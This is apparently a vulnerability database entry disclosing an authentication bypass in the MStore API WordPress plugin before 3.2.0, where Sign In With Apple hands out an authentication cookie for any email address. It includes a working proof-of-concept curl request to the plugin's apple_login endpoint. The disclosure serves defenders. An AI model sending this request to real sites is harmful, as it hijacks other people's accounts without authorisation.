MStore API < 3.2.0 - Authentication Bypass With Sign In With Apple

2021-02-02T00:00:00
ID WPEX-ID:BF5DDC43-974D-41FA-8276-C1A27D3CC882
Type wpexploit
Reporter Vincent Datrier
Modified 2021-02-18T06:00:55

Description

The plugin had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address.

                                        
                                            The plugin must have a valid purchase code for the request to work

curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "email@example.com" }' https://example.com/wp-json/api/flutter_user/apple_login